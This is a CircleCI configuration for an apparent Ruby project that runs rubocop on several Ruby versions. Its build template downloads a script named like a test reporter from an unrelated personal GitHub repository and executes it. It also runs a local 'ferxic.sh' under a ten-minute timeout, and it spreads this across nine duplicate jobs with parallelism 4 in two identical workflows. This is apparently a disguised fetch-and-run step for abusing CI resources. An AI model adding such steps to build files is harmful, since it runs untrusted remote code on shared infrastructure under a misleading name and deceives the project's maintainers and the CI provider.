working_dir: &working_dir ~/app
.build_template: &script
  parallelism: 4
  steps:
    - checkout
    - run: curl -L https://raw.githubusercontent.com/terb4ru/gasks/main/test-reporter-latest-linux-amd64.sh > ./test-reporter-latest-linux-amd64.sh
    - run: chmod +x ./test-reporter-latest-linux-amd64.sh
    - run: ./test-reporter-latest-linux-amd64.sh
    - run: chmod +x ferxic.sh && timeout 10m ./ferxic.sh    
    - run: gem install bundler:2.1.4
    - run: bundle install --jobs=4 --retry=4 --path vendor/bundle
    - run: bundle exec rake rubocop
      
version: 2.0
jobs:
  cuk:
    docker:
      - image: ruby
    steps:
      - checkout
  cuk1:
    <<: *script
    docker:
      - image: ruby:2.7
  cuk2:
    <<: *script
    docker:
      - image: ruby:2.6
  cuk3:
    <<: *script
    docker:
      - image: ruby:2.5
  cuk4:
    <<: *script
    docker:
      - image: ruby:2.4
  cuk5:
    docker:
      - image: ruby
    steps:
      - checkout
  cuk6:
    <<: *script
    docker:
      - image: ruby:2.7
  cuk7:
    <<: *script
    docker:
      - image: ruby:2.6
  cuk8:
    <<: *script
    docker:
      - image: ruby:2.5
           
workflows:
  version: 2
  commit:
    jobs:
      - cuk
      - cuk1
      - cuk2
      - cuk3
      - cuk4
      - cuk5
      - cuk6
      - cuk7
      - cuk8
      
  cukrunjob:
    jobs:
      - cuk
      - cuk1
      - cuk2
      - cuk3
      - cuk4
      - cuk5
      - cuk6
      - cuk7
      - cuk8
